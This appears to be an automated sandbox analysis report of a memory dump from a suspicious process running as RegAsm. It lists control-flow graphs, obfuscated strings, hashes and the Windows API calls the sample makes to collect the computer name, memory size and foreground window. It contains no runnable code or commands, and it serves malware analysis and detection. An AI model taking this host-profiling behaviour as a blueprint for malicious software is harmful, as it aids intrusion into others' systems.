                                                                                          control_flow_graph 617 40cfff-40d033 call 42e180 call 409a40 CoUninitialize 622 40d040-40d053 617->622 622->622 623 40d055-40d06f 622->623 624 40d070-40d082 623->624 624->624 625 40d084-40d0df 624->625 626 40d0e0-40d15c 625->626 626->626 627 40d15e-40d168 626->627 628 40d16a-40d16f 627->628 629 40d17b-40d189 627->629 632 40d170-40d179 628->632 630 40d18b-40d18f 629->630 631 40d19d 629->631 633 40d190-40d199 630->633 634 40d1a0-40d1ab 631->634 632->629 632->632 633->633 635 40d19b 633->635 636 40d1bb-40d1c6 634->636 637 40d1ad-40d1af 634->637 635->634 639 40d1c8-40d1c9 636->639 640 40d1db-40d1e3 636->640 638 40d1b0-40d1b9 637->638 638->636 638->638 641 40d1d0-40d1d9 639->641 642 40d1e5-40d1e6 640->642 643 40d1fb-40d207 640->643 641->640 641->641 644 40d1f0-40d1f9 642->644 645 40d221-40d2e9 643->645 646 40d209-40d20b 643->646 644->643 644->644 648 40d2f0-40d329 645->648 647 40d210-40d21d 646->647 647->647 649 40d21f 647->649 648->648 650 40d32b-40d34e 648->650 649->645 651 40d350-40d38f 650->651 651->651 652 40d391-40d3b4 call 40ba10 651->652 654 40d3b9-40d3d3 652->654
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: Uninitialize
                                                                                          • String ID: .'&!$KO$OR$TR$marshal-
                                                                                          • API String ID: 3861434553-4186242872
                                                                                          • Opcode ID: 9d51a3f42434fb4494f39143dd2913bf9920687ccccb745cf1108f45ec3071f9
                                                                                          • Instruction ID: 7f7fa5454b712477f53d7ba3493d83c7b489f696a6d8d11aec5a24939f9f6a57
                                                                                          • Opcode Fuzzy Hash: 9d51a3f42434fb4494f39143dd2913bf9920687ccccb745cf1108f45ec3071f9
                                                                                          • Instruction Fuzzy Hash: B3B112B56047818FD325CF29C490B22BFE1BF56300B0986ADD4D68F7A2D738D84ACB95

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 655 408af0-408afe call 4368e0 658 408b04-408b0b call 430010 655->658 659 408d3c-408d3e ExitProcess 655->659 662 408b11-408b40 GetCurrentThreadId 658->662 663 408d37 call 4379c0 658->663 664 408b42-408b46 662->664 665 408b48-408c04 GetForegroundWindow 662->665 663->659 664->665 667 408d13-408d2b call 409f60 665->667 668 408c0a-408d09 GetCurrentProcessId 665->668 667->663 673 408d2d call 40cf50 667->673 669 408d0b-408d0d 668->669 670 408d0f-408d11 668->670 669->670 670->667 675 408d32 call 40b9e0 673->675 675->663
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                          • String ID: rXT
                                                                                          • API String ID: 3118123366-3474455373
                                                                                          • Opcode ID: 215b5d317320f53d14b317407f0b617e1e5e2ae2c4ce312a1cd995ebf89164d0
                                                                                          • Instruction ID: a48ae5f2dbf7af896a0be9dbeac3444838c46f2ab100e951c749278ec69ea455
                                                                                          • Opcode Fuzzy Hash: 215b5d317320f53d14b317407f0b617e1e5e2ae2c4ce312a1cd995ebf89164d0
                                                                                          • Instruction Fuzzy Hash: 7651F2B3B587040BC70CAD69DD9635AB6D78BC8210F0E843EA999D7391EE7CDC0942C5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 677 40d922-40d934 678 40d940-40d95c 677->678 678->678 679 40d95e-40d994 call 408a80 call 4328d0 678->679 684 40d9a0-40d9cc 679->684 684->684 685 40d9ce-40da1a 684->685 686 40da20-40da71 685->686 686->686 687 40da73-40da7d 686->687 688 40da9b-40daa9 687->688 689 40da7f-40da84 687->689 691 40dabb-40dac3 688->691 692 40daab-40daaf 688->692 690 40da90-40da99 689->690 690->688 690->690 694 40dac5-40dacb 691->694 695 40dadd 691->695 693 40dab0-40dab9 692->693 693->691 693->693 696 40dad0-40dad9 694->696 697 40dae0-40daeb 695->697 696->696 698 40dadb 696->698 699 40dafb-40dbbf 697->699 700 40daed-40daef 697->700 698->697 702 40dbc0-40dbf0 699->702 701 40daf0-40daf9 700->701 701->699 701->701 702->702 703 40dbf2-40dc12 702->703 704 40dc20-40dc99 703->704 704->704 705 40dc9b-40dd04 call 40ba10 704->705 708 40dd10-40dd2c 705->708 708->708 709 40dd2e-40dd64 call 408a80 call 4328d0 708->709 714 40dd70-40dd9c 709->714 714->714 715 40dd9e-40ddef 714->715 716 40ddf0-40de3f 715->716 716->716 717 40de41-40de51 716->717 718 40de53-40de55 717->718 719 40de6b-40de82 717->719 720 40de60-40de69 718->720 721 40de84-40de85 719->721 722 40de9b-40dea3 719->722 720->719 720->720 723 40de90-40de99 721->723 724 40dec0 722->724 725 40dea5-40dea8 722->725 723->722 723->723 727 40dec3-40ded1 724->727 726 40deb0-40deb9 725->726 726->726 728 40debb 726->728 729 40ded3-40ded4 727->729 730 40deeb-40dfaf 727->730 728->727 732 40dee0-40dee9 729->732 731 40dfb0-40dfe0 730->731 731->731 733 40dfe2-40e009 731->733 732->730 732->732 734 40e010-40e089 733->734 734->734 735 40e08b-40e0a4 call 40ba10 734->735 737 40e0a9-40e0ce 735->737
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $I'K$&#($BDB1EF992B1E438FCEC5E79E34E047A9$U=]?$marshal-$zqrs
                                                                                          • API String ID: 0-2016788731
                                                                                          • Opcode ID: 09f7fef19c87c8c08c65c8ba6b2712a9c089114d081e09e92b66ed09c5d40dd8
                                                                                          • Instruction ID: 9d7743ca4000fac8c06106522c551aed374992fbf3a393855c396fbbee45f38f
                                                                                          • Opcode Fuzzy Hash: 09f7fef19c87c8c08c65c8ba6b2712a9c089114d081e09e92b66ed09c5d40dd8
                                                                                          • Instruction Fuzzy Hash: 3622F2B16047418FD329CF2AC9A1A53BBE2FF56310B1A85ADC4968F762D738E805CF54

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 738 409a40-409a4e 739 409a54-409aca call 4061a0 call 4082d0 738->739 740 409f07 738->740 746 409ad0-409b12 739->746 742 409f09-409f15 740->742 746->746 747 409b14-409b3f call 4092c0 746->747 750 409b40-409b54 747->750 750->750 751 409b56-409b8b call 4092c0 750->751 754 409b90-409bbb 751->754 754->754 755 409bbd-409bff call 4092c0 754->755 758 409c00-409c36 755->758 758->758 759 409c38-409c4e 758->759 760 409c50-409c68 759->760 760->760 761 409c6a-409c96 call 4092c0 760->761 764 409ca0-409cde 761->764 764->764 765 409ce0-409dbf call 409590 764->765 768 409dc0-409de0 765->768 768->768 769 409de2-409dea 768->769 770 409e11-409e18 769->770 771 409dec-409df4 769->771 772 409e20-409e25 770->772 773 409e00-409e0f 771->773 774 409e30-409e38 772->774 773->770 773->773 774->774 775 409e3a-409e3c 774->775 776 409e4c-409e7f 775->776 777 409e3e-409e4a 775->777 778 409e80-409ec4 776->778 777->772 778->778 779 409ec6-409edf call 40c480 778->779 781 409ee4-409f05 call 4082e0 779->781 781->742
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *,2.$BDB1EF992B1E438FCEC5E79E34E047A9$DC$TB]U$atmp$qlgf
                                                                                          • API String ID: 0-394132840
                                                                                          • Opcode ID: e0a13c5811b57c562521df8a20c65ad90ef9dbde5e25f822dfa1ed7295016f0f
                                                                                          • Instruction ID: eaea9df05184efdd0451a59c98752cb81c256bc9b68437fdf5e0cce1517d1c3a
                                                                                          • Opcode Fuzzy Hash: e0a13c5811b57c562521df8a20c65ad90ef9dbde5e25f822dfa1ed7295016f0f
                                                                                          • Instruction Fuzzy Hash: BCC1E2B154C7808BD714CF25D85176BBBE1EBC1314F188A6DE1E58B392DB78C80ACB5A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 784 427a08-427a41 785 427a50-427a80 784->785 785->785 786 427a82-427a8b 785->786 787 427d51 786->787 788 427a91-427a9a 786->788 790 427d54-427d89 787->790 789 427aa0-427aa9 788->789 789->789 791 427aab 789->791 793 427d90-427db6 790->793 791->790 793->793 794 427db8-427dc1 793->794 795 427dc3-427dc9 794->795 796 427ddb-427de7 794->796 799 427dd0-427dd9 795->799 797 427e01-427e20 call 43ad30 796->797 798 427de9-427deb 796->798 803 427e25-427e44 GetPhysicallyInstalledSystemMemory call 419b60 797->803 800 427df0-427dfd 798->800 799->796 799->799 800->800 802 427dff 800->802 802->797 805 427e49-427e68 803->805 806 427e70-427e8a 805->806 806->806 807 427e8c-427eb8 806->807 808 427ec0-427ee4 807->808 808->808 809 427ee6-427eef 808->809 810 427ef1-427efa 809->810 811 427f0d 809->811 813 427f00-427f09 810->813 812 427f10-427f18 811->812 814 427f1a-427f1b 812->814 815 427f2b-427f37 812->815 813->813 816 427f0b 813->816 817 427f20-427f29 814->817 818 427f4b-427faf 815->818 819 427f39-427f3f 815->819 816->812 817->815 817->817 821 427fb0-427fe8 818->821 820 427f40-427f49 819->820 820->818 820->820 821->821 822 427fea-427ff3 821->822 823 427ff5-427fff 822->823 824 42800d 822->824 825 428000-428009 823->825 826 428010-42801c 824->826 825->825 827 42800b 825->827 828 42803b-4280cc 826->828 829 42801e-428024 826->829 827->826 831 4280cd 828->831 830 428030-428039 829->830 830->828 830->830 831->831
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: CIBH$_lnu$~|*
                                                                                          • API String ID: 3960555810-2807066908
                                                                                          • Opcode ID: 90a9521c0778bfec3cb3917080456bc41fcc86a354a3f635dfe1db1de96cc68b
                                                                                          • Instruction ID: 47696c91e9934e85dbb284fa9d7da731d2c39803ce524e0a164785f27f0d4e79
                                                                                          • Opcode Fuzzy Hash: 90a9521c0778bfec3cb3917080456bc41fcc86a354a3f635dfe1db1de96cc68b
                                                                                          • Instruction Fuzzy Hash: 0FB1D470608B918FE725CF36D4607A3BBE1AF52304F5888AEC0DB8B792D779A405CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 832 42731b-42737f call 43ad30 836 427380-4273fa 832->836 836->836 837 4273fc-427405 836->837 838 427407-427416 837->838 839 42742d-427430 837->839 840 427420-427429 838->840 841 427436-427442 839->841 840->840 842 42742b 840->842 843 427444-42744a 841->843 844 42745b-4274bf call 43ad30 GetComputerNameExA 841->844 842->841 845 427450-427459 843->845 849 4274c0-4274da 844->849 845->844 845->845 849->849 850 4274dc-4274e5 849->850 851 4274e7-4274ef 850->851 852 4274fb-427507 850->852 853 4274f0-4274f9 851->853 854 42751b-42757b GetComputerNameExA 852->854 855 427509-42750f 852->855 853->852 853->853 856 427580-4275b5 854->856 857 427510-427519 855->857 856->856 858 4275b7-4275c0 856->858 857->854 857->857 859 4275c2-4275cb 858->859 860 4275dd 858->860 861 4275d0-4275d9 859->861 862 4275e0-4275ec 860->862 861->861 863 4275db 861->863 864 42760b-427667 862->864 865 4275ee-4275f4 862->865 863->862 868 427670-42768a 864->868 866 427600-427609 865->866 866->864 866->866 868->868 869 42768c-427695 868->869 870 427697-42769f 869->870 871 4276ab-4276b7 869->871 872 4276a0-4276a9 870->872 873 4276cb-427736 call 43ad30 871->873 874 4276b9-4276bf 871->874 872->871 872->872 879 427740-427783 873->879 875 4276c0-4276c9 874->875 875->873 875->875 879->879 880 427785-42778e 879->880 881 427790-427798 880->881 882 4277ad 880->882 883 4277a0-4277a9 881->883 884 4277af-4277be 882->884 883->883 887 4277ab 883->887 885 427907-42795a 884->885 886 4277c4-4277cb 884->886 889 427960-4279b2 885->889 888 4277d0-4277e3 886->888 887->884 890 4277f0-4277f6 888->890 891 4277e5-4277ed 888->891 889->889 892 4279b4-4279c3 889->892 894 427840-42784c 890->894 895 4277f8-4277fb 890->895 893 427815-427817 891->893 896 4279c5-4279cb 892->896 897 4279db-4279de call 42c1b0 892->897 899 42781a-42781c 893->899 902 4278a9-4278b1 894->902 903 42784e-427851 894->903 895->894 898 4277fd-427812 895->898 900 4279d0-4279d9 896->900 905 4279e3-427a02 897->905 898->893 904 42781e-427827 899->904 900->897 900->900 907 4278b3-4278b9 902->907 908 4278be-4278c4 902->908 903->902 906 427853-4278a4 903->906 904->885 911 42782d-42782f 904->911 906->899 907->904 909 4278c6-4278f8 908->909 910 4278fd-427902 908->910 909->899 910->899 911->888 912 427831 911->912 912->885
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042749B
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00427536
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: cUkR
                                                                                          • API String ID: 3545744682-1640818974
                                                                                          • Opcode ID: 4352ea4f77dfbc1bb2416e8356b5a481a92e61bcc1112b7540e68fcce2a5ba3f
                                                                                          • Instruction ID: 2631a9525a49a76b46fd2586bb9845f3148378d491b813c94ec1ab60cbf231dc
                                                                                          • Opcode Fuzzy Hash: 4352ea4f77dfbc1bb2416e8356b5a481a92e61bcc1112b7540e68fcce2a5ba3f
                                                                                          • Instruction Fuzzy Hash: 4FF1B270218B918EE725CF35C5507B3BBE19F66304F48899EC1EB8B293D779A406CB25

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 913 42730e-427475 call 43ad30 916 42747a-4274bf GetComputerNameExA 913->916 917 4274c0-4274da 916->917 917->917 918 4274dc-4274e5 917->918 919 4274e7-4274ef 918->919 920 4274fb-427507 918->920 921 4274f0-4274f9 919->921 922 42751b-42757b GetComputerNameExA 920->922 923 427509-42750f 920->923 921->920 921->921 924 427580-4275b5 922->924 925 427510-427519 923->925 924->924 926 4275b7-4275c0 924->926 925->922 925->925 927 4275c2-4275cb 926->927 928 4275dd 926->928 929 4275d0-4275d9 927->929 930 4275e0-4275ec 928->930 929->929 931 4275db 929->931 932 42760b-427667 930->932 933 4275ee-4275f4 930->933 931->930 936 427670-42768a 932->936 934 427600-427609 933->934 934->932 934->934 936->936 937 42768c-427695 936->937 938 427697-42769f 937->938 939 4276ab-4276b7 937->939 940 4276a0-4276a9 938->940 941 4276cb-427736 call 43ad30 939->941 942 4276b9-4276bf 939->942 940->939 940->940 947 427740-427783 941->947 943 4276c0-4276c9 942->943 943->941 943->943 947->947 948 427785-42778e 947->948 949 427790-427798 948->949 950 4277ad 948->950 951 4277a0-4277a9 949->951 952 4277af-4277be 950->952 951->951 955 4277ab 951->955 953 427907-42795a 952->953 954 4277c4-4277cb 952->954 957 427960-4279b2 953->957 956 4277d0-4277e3 954->956 955->952 958 4277f0-4277f6 956->958 959 4277e5-4277ed 956->959 957->957 960 4279b4-4279c3 957->960 962 427840-42784c 958->962 963 4277f8-4277fb 958->963 961 427815-427817 959->961 964 4279c5-4279cb 960->964 965 4279db-4279de call 42c1b0 960->965 967 42781a-42781c 961->967 970 4278a9-4278b1 962->970 971 42784e-427851 962->971 963->962 966 4277fd-427812 963->966 968 4279d0-4279d9 964->968 973 4279e3-427a02 965->973 966->961 972 42781e-427827 967->972 968->965 968->968 975 4278b3-4278b9 970->975 976 4278be-4278c4 970->976 971->970 974 427853-4278a4 971->974 972->953 979 42782d-42782f 972->979 974->967 975->972 977 4278c6-4278f8 976->977 978 4278fd-427902 976->978 977->967 978->967 979->956 980 427831 979->980 980->953
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042749B
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00427536
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: cUkR
                                                                                          • API String ID: 3545744682-1640818974
                                                                                          • Opcode ID: 8509d55dd6ccddc033a7daa05e627d9599f6055766af215d87809310fdad9889
                                                                                          • Instruction ID: 08ad09fdb5d6a525c07c8799b6f8e1d68a2b57056c24ed5487a9e5388f6fa670
                                                                                          • Opcode Fuzzy Hash: 8509d55dd6ccddc033a7daa05e627d9599f6055766af215d87809310fdad9889
                                                                                          • Instruction Fuzzy Hash: 40F1F470218B918EE725CF35C4907A3FBE1EF56304F58895EC0EA8B782D779A406CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 981 427d36-427d89 call 42d8f0 call 4082e0 987 427d90-427db6 981->987 987->987 988 427db8-427dc1 987->988 989 427dc3-427dc9 988->989 990 427ddb-427de7 988->990 993 427dd0-427dd9 989->993 991 427e01-427e20 call 43ad30 990->991 992 427de9-427deb 990->992 997 427e25-427e44 GetPhysicallyInstalledSystemMemory call 419b60 991->997 994 427df0-427dfd 992->994 993->990 993->993 994->994 996 427dff 994->996 996->991 999 427e49-427e68 997->999 1000 427e70-427e8a 999->1000 1000->1000 1001 427e8c-427eb8 1000->1001 1002 427ec0-427ee4 1001->1002 1002->1002 1003 427ee6-427eef 1002->1003 1004 427ef1-427efa 1003->1004 1005 427f0d 1003->1005 1007 427f00-427f09 1004->1007 1006 427f10-427f18 1005->1006 1008 427f1a-427f1b 1006->1008 1009 427f2b-427f37 1006->1009 1007->1007 1010 427f0b 1007->1010 1011 427f20-427f29 1008->1011 1012 427f4b-427faf 1009->1012 1013 427f39-427f3f 1009->1013 1010->1006 1011->1009 1011->1011 1015 427fb0-427fe8 1012->1015 1014 427f40-427f49 1013->1014 1014->1012 1014->1014 1015->1015 1016 427fea-427ff3 1015->1016 1017 427ff5-427fff 1016->1017 1018 42800d 1016->1018 1019 428000-428009 1017->1019 1020 428010-42801c 1018->1020 1019->1019 1021 42800b 1019->1021 1022 42803b-4280cc 1020->1022 1023 42801e-428024 1020->1023 1021->1020 1025 4280cd 1022->1025 1024 428030-428039 1023->1024 1024->1022 1024->1024 1025->1025
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: CIBH$_lnu
                                                                                          • API String ID: 3960555810-984119573
                                                                                          • Opcode ID: 9d973da7cb8a114e66c5f25e3a949c8ba8e3822dc219e349e17634a29b3130b6
                                                                                          • Instruction ID: a2bb3684557162ee2f49806f260b602f9b7871237fe13f1eab2b60d67e6459de
                                                                                          • Opcode Fuzzy Hash: 9d973da7cb8a114e66c5f25e3a949c8ba8e3822dc219e349e17634a29b3130b6
                                                                                          • Instruction Fuzzy Hash: 89A1B170608B918FD725CF3A94607A7FBE1AF52304F5888AEC0DB8B792C779A405CB55

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1026 427d4f-427d89 1028 427d90-427db6 1026->1028 1028->1028 1029 427db8-427dc1 1028->1029 1030 427dc3-427dc9 1029->1030 1031 427ddb-427de7 1029->1031 1034 427dd0-427dd9 1030->1034 1032 427e01-427e44 call 43ad30 GetPhysicallyInstalledSystemMemory call 419b60 1031->1032 1033 427de9-427deb 1031->1033 1040 427e49-427e68 1032->1040 1035 427df0-427dfd 1033->1035 1034->1031 1034->1034 1035->1035 1037 427dff 1035->1037 1037->1032 1041 427e70-427e8a 1040->1041 1041->1041 1042 427e8c-427eb8 1041->1042 1043 427ec0-427ee4 1042->1043 1043->1043 1044 427ee6-427eef 1043->1044 1045 427ef1-427efa 1044->1045 1046 427f0d 1044->1046 1048 427f00-427f09 1045->1048 1047 427f10-427f18 1046->1047 1049 427f1a-427f1b 1047->1049 1050 427f2b-427f37 1047->1050 1048->1048 1051 427f0b 1048->1051 1052 427f20-427f29 1049->1052 1053 427f4b-427faf 1050->1053 1054 427f39-427f3f 1050->1054 1051->1047 1052->1050 1052->1052 1056 427fb0-427fe8 1053->1056 1055 427f40-427f49 1054->1055 1055->1053 1055->1055 1056->1056 1057 427fea-427ff3 1056->1057 1058 427ff5-427fff 1057->1058 1059 42800d 1057->1059 1060 428000-428009 1058->1060 1061 428010-42801c 1059->1061 1060->1060 1062 42800b 1060->1062 1063 42803b-4280cc 1061->1063 1064 42801e-428024 1061->1064 1062->1061 1066 4280cd 1063->1066 1065 428030-428039 1064->1065 1065->1063 1065->1065 1066->1066
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00427E2C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: CIBH$_lnu
                                                                                          • API String ID: 3960555810-984119573
                                                                                          • Opcode ID: ea4bbfb4eb7fe34811cc17a5cbaef481ecb2303c0045911029fb0a7c8fae4abf
                                                                                          • Instruction ID: 3e513490e3630ff00b8492a31ce46514cb33d6c8190ff517c07bcdcbd49a14c7
                                                                                          • Opcode Fuzzy Hash: ea4bbfb4eb7fe34811cc17a5cbaef481ecb2303c0045911029fb0a7c8fae4abf
                                                                                          • Instruction Fuzzy Hash: 33A1C270608B918EE725CF3A94607A3BBE1AF52304F5889AEC0DB8B792C7796405CB55
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID:
                                                                                          • API String ID: 4116985748-3916222277
                                                                                          • Opcode ID: 9d417bebad8767355f5a3150051b72f88514b915f49f7c877b5b5b127bdc4e16
                                                                                          • Instruction ID: 7ffaf50f013e515cdccb5d18165b5c57dc22c2f3b4628cb64ea43bf992c5b7ec
                                                                                          • Opcode Fuzzy Hash: 9d417bebad8767355f5a3150051b72f88514b915f49f7c877b5b5b127bdc4e16
                                                                                          • Instruction Fuzzy Hash: AD5191B0E152199FDB40EFADE985A9DBBF0BF48300F108529E898E7354D734A945CF86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: !65"$%*+($;>3
                                                                                          • API String ID: 2994545307-1343997536
                                                                                          • Opcode ID: 3461a0fd59c564cd22dcc78a87597d0a57dfc51654cee219b174401dfeb5d1c5
                                                                                          • Instruction ID: 9c8accba8b92abf18e1594b76db8a62947509ae7321b67fd8142dc787c231cfb
                                                                                          • Opcode Fuzzy Hash: 3461a0fd59c564cd22dcc78a87597d0a57dfc51654cee219b174401dfeb5d1c5
                                                                                          • Instruction Fuzzy Hash: 26C17C71B083604BD714DF2498817AF7792EFE1744F99852EE8854B3A2E778DD06C38A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: '"$. /&$:,":
                                                                                          • API String ID: 0-2114766974
                                                                                          • Opcode ID: e24e6c48d4e77705d9c09bfe272564e535c5c4cf195ad53baea96fd9ddb3e0df
                                                                                          • Instruction ID: 4fe767104c4f3db500b5cf8a4ede20fd35f8d5db63cce934ca3192c17b7f1f3c
                                                                                          • Opcode Fuzzy Hash: e24e6c48d4e77705d9c09bfe272564e535c5c4cf195ad53baea96fd9ddb3e0df
                                                                                          • Instruction Fuzzy Hash: 23C1137110C3958BC314CF25C89466BBBE2EFC2344F198D6DE8D56B391D7798809CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: :$sq
                                                                                          • API String ID: 0-4203955133
                                                                                          • Opcode ID: 4fe4355c2d7675bdd0673cfda56034ac6e61dc8d580f8c335f8c9cf19b7f850c
                                                                                          • Instruction ID: aee60ef50b283315c28260fc85a81de8ca57b1d128fcb2a4f852c92e4046da37
                                                                                          • Opcode Fuzzy Hash: 4fe4355c2d7675bdd0673cfda56034ac6e61dc8d580f8c335f8c9cf19b7f850c
                                                                                          • Instruction Fuzzy Hash: E10277B5200B01CFD3248F25D895B97BBF5FB86314F148A2DE5AA8BAA0C774A409CF55
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00437D83
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: b39055798cd0f4dd82357cf694a7b56a7edcfa3dc3ed6c79585fcfbb05c9314c
                                                                                          • Instruction ID: 2e9015d5033efce51b99a9987a2fe2c503fc9c13cfbaace310aff2b4b3296eaa
                                                                                          • Opcode Fuzzy Hash: b39055798cd0f4dd82357cf694a7b56a7edcfa3dc3ed6c79585fcfbb05c9314c
                                                                                          • Instruction Fuzzy Hash: 2B01D67AFA19014BEB188F34DC532A977E3E78B325B0CD53D8482D3348DA3CD9064A48
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(0043B73E,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00437AAE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                          • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                          • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                          • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
